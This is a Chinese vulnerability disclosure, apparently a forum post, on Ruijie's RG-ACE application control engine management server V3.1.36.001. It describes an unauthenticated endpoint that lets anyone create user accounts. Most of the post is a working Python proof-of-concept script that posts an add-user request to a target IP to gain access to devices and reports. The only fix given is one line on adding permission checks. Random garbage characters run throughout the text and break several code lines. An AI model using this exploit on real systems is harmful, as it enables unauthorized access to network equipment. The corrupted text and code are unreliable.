锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）


测试的具体版本是
产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
& C4 F  _4 J6 X& o; p, \编译时间: 201104291730

; g" J  T$ \1 H
- ~2 `5 H! J+ M6 D/ E# z, _漏洞证明：
$ r! }2 }) _' [5 d# p
! X+ r6 z* @; c# h  s8 E


& X1 Z1 W, \* _" {8 y' X
+ i( L; ]; T. @- W
  u0 R* q; z- f3 S& G执行脚本
#! /usr/bin/env python
% S7 ~8 q, B0 f#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
9 m. f  K" f4 f# ]# @% Z' Z% simport urllib2, urllib,cookielib
/ v# X9 I# O# s5 ]/ q5 n- G& q6 S/ durl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
9 E5 Y' c1 p$ G" eopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
+ A# S2 z8 O. R6 z("useractionname","addButtonValue"),
5 i* e( n7 W7 ?( H("useropermanager","userManager"),
0 Q8 _$ O" s/ L' u4 U- Y("userName","t"), #######账号自己加
9 p6 w) U6 s& f& v) O("pwd","aaaaaa"),######密码自己加
2 _8 P( [5 E! h: }1 E  y("trueName","ad"),
("email",""),
("mobilePhone",""),
("officePhone",""),
("addr",""),
/ {& N3 o! v0 N: a5 F" k# Q("submit","确定"))
urllib2.install_opener(opener)
+ G) X5 m2 A& Q+ z7 s7 t- bp=urllib2.urlopen(url, urllib.urlencode(post)).read()
8 a- x( F5 k) m" F- M+ V4 Uprint "Done"

登录，连接设备


( D! n5 D  R* \4 N" K" H
5 U+ g6 q4 Y: G

0 Q$ ?3 P, ?) f% Z3 _* f8 \0 ?! Q默认的管理员admin权限更大点

  B1 t2 @& C0 t  h( `  Z

( ~' V) r: }7 x

修复方案：
1 a0 ~* h# v3 C8 b- J加强对接口的权限验证
8 v0 |$ Y  J! ^. B0 S& g4 c
9 a/ @$ `, h( h: n$ G